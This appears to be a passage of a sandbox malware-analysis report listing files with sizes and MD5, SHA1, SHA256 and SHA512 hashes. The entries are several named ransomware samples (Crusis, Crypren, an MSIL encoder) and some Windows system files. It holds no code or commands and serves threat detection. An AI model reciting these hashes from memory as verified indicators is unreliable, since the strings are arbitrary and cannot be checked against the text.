SHA114ea97ae1fb39104870c322d293b8e188fbe8dd4
SHA256ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f
SHA512639c6e127668e7057263e6db7a7761711a52aaed082b1c0f863b8164248b124ad0b455f8fd86bc3d06fac0a68201695ee067c1e6789b3ae564edd93d874d8132
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
Filesize7.9MB
MD544ae44b1318428dda1cb041167a58b84
SHA1559c7628896672dc7dce4662ef4904dea2ff0c59
SHA256815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad
SHA512d84e0b501ec4ac93c21b87277eb63254ead4ea6faadcacecfb9abd564b34c2069b76a32d827fe4a52b7e83fc75c75847bd7bc8d321e48ff2c1265e2327d5fdc7
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
Filesize6.5MB
MD52e171a12b837a11f66bc7a9319ab0088
SHA17e8a217af97b3df69fa64d594cd4200ff9d1994a
SHA256b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81
SHA512db55894dee3f1378b8463c82ab0c9e996c5760b6e5afe4b101511b33e9b59ce90a44aa0e27ed038941db54e777a6b6a0333f3eeda54b71c607c152d2ba03591c
-
C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.19041.746_none_9d44fd61d4c8aeec\SecurityHealthSystray.exe
Filesize84KB
MD50a06a969020bad81eb958b587b93811f
SHA117b242ff5c27c1c3c3593581745c7517094888de
SHA25679c84cb3e45d68a5c390ef3dd2c9eb9d5d205ec097e08be7154a287714cc54a9
SHA51245e7e79a4b467843fffedfd84b1674f355fbeb1f785252affa0b36a7802ca4ecb6d7307474ab676c1a44220266bd7e9befe49f866c2eab8cb3be80edc8516452
-
C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\FeatureToastBulldogImg.png
Filesize43KB
MD5f77c79b717217eb84b7051376c815d8a
SHA1df23e628d3351c403c296d3a3169179de1e32490
SHA2565cbfd6ba6581582caa3ef2772630b906665bee0ae1b9cd562c05da09d9023d88
SHA512fe4f87e92b7f872cd4f2c767aea05a9804e8a6f053a58b1914d40de355af0ff05136b275feaeba12052b8b4fa27fb0b8e8008444b6656a4bb5718072974eea5d
-
C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\WindowsSecurityIcon.png
Filesize816B
MD52551bd3743652c78c5f5934f76e9123d
SHA1a3f8e082ba3aa17a715b6536091c60fa10d6dcd2
SHA25675524589c798656b82c39a4ffc9536639442e09903013b01177b2723e29c643c
SHA512ddf64fafbaff44d4127d2c42f534896c706ce13618a287d3c682c6395fa92d74adac99bde6d0a8565515484a9069feab425407a7f0951db5be6d0e92ee2f2329
-
Filesize
532B
MD525994370ef89a0cd17b390e9af744b53
SHA1401a759d64989ab570e5abca8eb4f1c4c30764e5
SHA2567a64e7f617de76ac498b7e0543c9992b666dce032725c25ba0abdfaf1ef8feb9
SHA512a2a705c9d58fb5f2e9e49a014da1b65a27670e616c4a53fb7c048a9d14d409d5dbc58202ccd87eb2dbad4d412b9c0d73eb50945b9838e1b812f90609e10fd25a
-
\??\c:\users\admin\desktop\00403\heur-trojan-ransom.msil.encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
Filesize878KB
MD5ea9c0a193eb474d8aac552ccd65ce047
SHA1d88dd3fcb954b2c33b51a588784b1db9b23bae85
SHA2566b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab
SHA512c0c7dd5b3ca0199562dfd46bc0ea0570fdd0800d34c1fd595a272198e6372e7dccb1ebeeb000da88d24c42af3d48f44eb2f6f6fdae7cd555d4228ede50ba280a
-
\??\c:\users\admin\desktop\00403\heur-trojan-ransom.win32.foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
Filesize8.1MB
MD5b55973a0a834c70064148209b9302d59
SHA16945159ac7c97fc629eee9ec738cb69d34c5b6ca
SHA256c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f
SHA512bf4470b250406f45c12a9043c0e86528117e9dac149a0a9a234dd663926115b109926fa04ec1373586db627789a0f8c11a866e58f5a823f67d15d4b8334c583a